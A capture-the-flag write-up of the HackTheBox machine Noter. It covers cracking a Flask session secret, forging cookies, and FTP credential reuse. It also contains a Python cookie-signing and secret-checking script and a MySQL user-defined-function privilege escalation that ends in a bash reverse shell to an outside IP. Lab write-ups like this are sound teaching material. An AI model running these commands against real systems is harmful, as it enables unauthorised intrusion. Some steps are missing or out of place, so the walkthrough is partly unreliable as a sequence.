HackTheBox - Noter

Summary

Noter was a medium-difficulty Linux box created by kavigihan. The initial foothold was finding a weak signing key used to sign the session cookie; with it we can modify the session and give ourselves VIP access. Using that we get the FTP credentials, and on the FTP server we find a PDF containing a hint for the ftp_admin credentials. Logging in as ftp_admin, we get access to an app backup. In the backup we find the /export_note_local route, which takes markdown and exports it as a PDF. Using this we get command injection and access to the box as svc, and we then escalate privileges using module (user-defined function) injection in MySQL.

Enumeration

nmap

# Nmap 7.92 scan initiated Sun May  8 04:06:01 2022 as: nmap -sC -sV -oN nmap/noter noter.htb
Nmap scan report for noter.htb (10.129.58.78)
Host is up (0.30s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c6:53:c6:2a:e9:28:90:50:4d:0c:8d:64:88:e0:08:4d (RSA)
| 256 5f:12:58:5f:49:7d:f3:6c:bd:9b:25:49:ba:09:cc:43 (ECDSA)
|_ 256 f1:6b:00:16:f7:88:ab:00:ce:96:af:a6:7e:b5:a8:39 (ED25519)
5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title: Noter
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 8 04:10:20 2022 -- 1 IP address (1 host up) scanned in 259.89 seconds

Port 5000

Opening the page, we see what looks like a note-taking application running on Werkzeug.

Let's register on the website and see what happens.

After a successful registration, let's log in.

On the dashboard we see two buttons: Add Note and Upgrade to VIP.

Creating some notes, we see the endpoint /note/4/. Let's look for others.

Not finding anything, I looked into unsigning the cookie to maybe find the secret:

flask-unsign -u -c "eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiZjN2M3IifQ.Ynd81g.NGys3evMvZ-sFmG0a1JEg6KulBY" -w "/usr/share/wordlists/rockyou.txt" --no-literal-eval

and was able to find the secret: secret123.

Enumerating for users on the login screen based on the error message, we find a username: blue.

Forging a cookie for that user and trying it out, we find a note:
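The weak-secret problem above, as an added example (not the author's code or the Noter application): stdlib-only Python that mirrors Flask's default session-cookie signing (itsdangerous URLSafeTimedSerializer with salt cookie-session and HMAC-SHA1 key derivation) so a defender can audit their own app. It shows that the payload is readable without any secret, checks a cookie against a short constructed list of weak or default secrets the way flask-unsign does, and generates a proper SECRET_KEY; the sample session dict and the candidate list are constructed.

```python
import base64, hashlib, hmac, json, secrets, time, zlib
SALT = b"cookie-session"  # salt Flask uses for session cookies

def _b64e(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _derived_key(secret: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1 keyed with the secret over the salt
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()

def decode_payload(cookie: str) -> dict:
    """Session contents are readable by anyone: the cookie is signed, not encrypted."""
    compressed = cookie.startswith(".")  # leading dot marks a zlib-compressed payload
    raw = _b64d(cookie.lstrip(".").split(".")[0])
    return json.loads(zlib.decompress(raw) if compressed else raw)

def sign_session(data: dict, secret: str, ts=None) -> str:
    """Build payload.timestamp.signature the way Flask's serializer does."""
    body = json.dumps(data, separators=(",", ":")).encode()
    comp = zlib.compress(body)
    payload = "." + _b64e(comp) if len(comp) < len(body) - 1 else _b64e(body)
    ts = int(time.time()) if ts is None else ts
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    head = f"{payload}.{ts_b64}"
    sig = hmac.new(_derived_key(secret), head.encode(), hashlib.sha1).digest()
    return f"{head}.{_b64e(sig)}"

def verify_session(cookie: str, secret: str) -> bool:
    head, _, sig = cookie.rpartition(".")
    try:
        got = _b64d(sig)
    except ValueError:  # binascii.Error is a ValueError
        return False
    want = hmac.new(_derived_key(secret), head.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(got, want)

def find_weak_secret(cookie: str, candidates):
    """Config audit: a cookie that validates under a guessable secret means anyone can mint sessions."""
    for cand in candidates:
        if verify_session(cookie, cand):
            return cand
    return None

def generate_secret() -> str:
    return secrets.token_hex(32)  # 256-bit random SECRET_KEY: the fix for a guessable key
```

If find_weak_secret returns a value for a cookie issued by your own deployment, rotate SECRET_KEY to the output of generate_secret, which invalidates every existing session.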

Logging into the FTP service, we find policy.pdf, which shows the password creation pattern.

Logging in as ftp_admin with the password ftp_admin@Noter!,

we find an app backup, so we download it.

Shell

Nildogg36

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.68/1337 0>&1"');

Root Shell

https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/Noter/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.